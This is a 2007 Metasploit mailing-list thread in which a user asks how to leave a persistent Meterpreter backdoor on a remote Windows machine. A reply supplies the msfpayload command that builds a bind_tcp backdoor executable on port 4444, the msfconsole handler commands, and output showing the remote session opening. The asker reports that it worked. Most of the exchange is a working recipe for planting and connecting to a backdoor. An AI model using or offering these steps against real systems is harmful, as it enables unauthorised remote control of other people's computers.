[framework] Place a Meterpreter backdoor
BardoBaggins
bardo at mclink.it
Fri May 11 10:58:09 CDT 2007
Thanks!
That was EXACTLY what I wanted to know :)
tried out adn worked perfectly... except for a little issue. If I try to
NMAP (SYN Scan) the 4444 port on the remote host to check if it's open,
the backdoor process crashes. This happened on a WinXP SP2 Italian.
Bye !
Bardo
Ramakrishna Nyayapathi wrote:
> Yes there is. In the framework directory,
>
> ./msfpayload windows/meterpreter/bind_tcp LPORT=4444 EXITFUNC=thread X
> > met_bkdoor.exe
>
> Executing this file on the target machine should set up a meterpreter
> backdoor on 4444.
>
> in msfconsole,
>
> msf > use multi/handler
> msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
> PAYLOAD => windows/meterpreter/bind_tcp
> msf exploit(handler) > set RHOST 1.2.3.4 <http://1.2.3.4>
> RHOST => 1.2.3.4 <http://1.2.3.4>
> msf exploit(handler) > exploit
> [*] Started bind handler
> [*] Starting the payload handler...
> [*] Transmitting intermediate stager for over-sized stage...(89 bytes)
> [*] Sending stage (2834 bytes)
> [*] Sleeping before handling stage...
> [*] Uploading DLL (81931 bytes)...
> [*] Upload completed.
> [*] Meterpreter session 1 opened (1.2.3.3:1376 <http://1.2.3.3:1376>
> -> 1.2.3.4:4444 <http://1.2.3.4:4444>)
>
> meterpreter >
>
> Hope that helps..
>
>
> On 5/10/07, *BardoBaggins* < bardo at mclink.it <mailto:bardo at mclink.it>>
> wrote:
>
> Hello !
>
> First, I would like to apologize if my question is kinda "dumb".
> I'm a
> newbie in the field and I'm ever longing for new knowledge.
>
> Anyway, the question is : Is it possible to place a permanent
> meterpreter process running on a remote machine acting as a backdoor ?
>
> Tnx. Bye !!
>
> Bardo
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://spool.metasploit.com/pipermail/framework/attachments/20070511/3813a743/attachment.htm
More information about the framework
mailing list